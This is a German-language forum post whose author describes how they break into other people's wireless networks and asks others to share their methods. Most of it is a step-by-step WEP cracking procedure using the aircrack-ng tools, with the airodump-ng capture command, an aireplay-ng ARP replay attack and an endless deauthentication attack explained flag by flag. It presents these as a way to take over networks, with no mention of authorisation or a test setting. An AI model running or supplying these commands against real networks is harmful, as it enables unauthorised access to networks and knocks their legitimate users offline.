Hi Jungs.
Mich interessiert wie ihr so eure Netzwerke owned.
Ich mach es folgender Maßen ich bin mir sicher da gibts noch besser schnellere oder andere Wege diese interessiern mich total deswegen postet einfach wie ihr das so macht aber bitte verständlich!
airodump-ng -w test -c 6 wlan01. Airodump-ng startet
2. "-w test" schreibt er alles was er findet in die Datei "test-01.cap"
3. "-c 6" er sucht nur auf Kanal 6 nach Netzwerken andere Frequenzen wie 4,5 oder 7,8 zeigt er manchmal auch an da diese sich mit dem Kanal 6 überschneiden!
4. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".
Hier schreibt er die Capture Datei welche ich wenn ich mehrer Hundertausende IVs habe an Aircrack übergebe dieses knackt dann den KEY
aireplay-ng -3 wlan0 -b AP_MAC -h CLIENT_MAC -x 10240. Aireplay-ng startet
1. -3 Modi in Aireplay
2. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".
3. -b AP_MAC <-- Mac Adresse des Accesspointes welcher mich interessiert und Clients verbunden hat.
4. -h CLIENT_MAC <-- Mac Adresse des Clients welcher auf dem vorhergenannten AP verbunden ist.
5. -x 1024 <-- Anzahl der Packete 1024 ist der Maximal Wert (Geschwindigkeit)
Hier startet er die Replay Attacke sobald ich den Client rausgeworfen habe und dieser sich neu verbindet
aireplay-ng -0 0 wlan0 -a AP_MAC -c CLIENT_MAC0. Aireplay-ng startet
1. -0 Modi zum Deauthen im Aireplay
2. 0 <-- führt vorhergenanten befehl unendlich aus. schreibt man z.b. 6 dann führt er den befehl 6 mal aus
3. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".
4. -a AP_MAC <-- Mac Adresse des Accesspointes welchen ich auch schon in aireplay-ng -3 siehe II angegeben habe
5. -c CLIENT_MAC <-- Mac adresse des Clients welchen ich auch schonmal oben angegeben habe siehe II
Hiermit werfe ich den Client raus! Er verbindet sich neu, genau das will ich!Am Ende wenn airodump genung Data hat übergebe ich das Packet an Aircrack und fertig ist es :-)
So jetzt interessiert es mich wie ihr das soo macht?